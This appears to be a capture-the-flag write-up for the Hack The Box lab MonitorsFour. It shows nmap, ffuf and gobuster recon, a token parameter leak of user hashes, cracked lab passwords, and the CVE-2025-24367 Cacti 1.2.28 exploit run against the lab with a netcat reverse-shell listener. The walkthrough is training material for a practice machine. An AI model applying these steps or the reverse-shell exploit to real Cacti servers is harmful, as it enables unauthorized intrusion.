Share
## https://sploitus.com/exploit?id=0D1980E0-91F8-5335-B6EA-0C130DC2496D
# MonitorsFour-Write-UP
Hack The Box MonitorsFour is an Easy-rated Windows machine focused on web exploitation, credential discovery, container abuse, and Docker escape techniques. The lab teaches how multiple small misconfigurations can be chained into full system compromise.


	• Enumeration : Scan Port using nmap 
	
	CMD : nmap -sS 
	

	
	Http - 80 
	WinRM - 5985
	
	• Explore Webpage : But not Open because it is Resolve to = monitorsfour.htb
	
	We can set IP and Domain name in /etc/hosts File.
	
	

	• Explore Again Http Web pages : In this Web Page Found Login Page 

	

	
	
	
	• Identify Subdomains : Using TOOL = FFUF
	
	CMD :  ffuf -u http://monitorsfour.htb -H 'Host: FUZZ.monitorsfour.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 50 -fs 138
	

	
	SUBDOMAIN : cacti 
	
	• Explore This Subdomain and Add In /etc/hosts file :
	

	
	Founded This Login Page and this Login page Version
	
	Version : 1.2.28
	
	• Directory Busting : Using Tool = Gobuster 
	
	CMD :  gobuster dir -u http://monitorsfour.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt   -t 20 
	
	

	
	See these Pages on = monitorsfour.htb URL
	
	• Check User Page :  
	

	Missing Parameter Error 
	
	Try to ADD Token Parameter 
	
	/user?token=0
	

	
	Found a users Credential - Name , ID , HASH, Email, Role , etc. Details
	
	Analys Super User Role : Copy Password Hash 
	
	• Crack Password in Some Websites : crack station , Hashes.com 
	
	Hashes.com 
	

	
	Username = Admin 
	Password = Wonderful1
	
	• Login with monitorsfour.htb/login page :  
	

	Login Success Ful
	
	• Login With cacti.monitorsfour.htb/cacti : 
	
	Username : marcus
	Password : wonderful1
	

	
	
	Login Success Ful
	
	
	
	• Find Version Exploit : on Browsers 
	
	Version : 1.2.28
	
	

	We Found This Exploit - Cybergeek
	
	- CVE-2025-24367
	
	- Download Code - Exploit.py
	- Make it Executable 
	- Run with this Command : 
	
	ATTACKER
	CMD : python3 exploit.py -u marcus -p wonderful1 -i  -l 1234 -url http://cacti.monitorsfour.htb
	
	- Before this Command Start Listening on Netcap
	
	ATTACKER
	CMD : nc -nlvp 1234
	

	
	
	ACCESS Successful : With User.txt
	
	
	
USER.TXT---------------------------------------------------------------FLAG{}-------------------------------------------------------------------------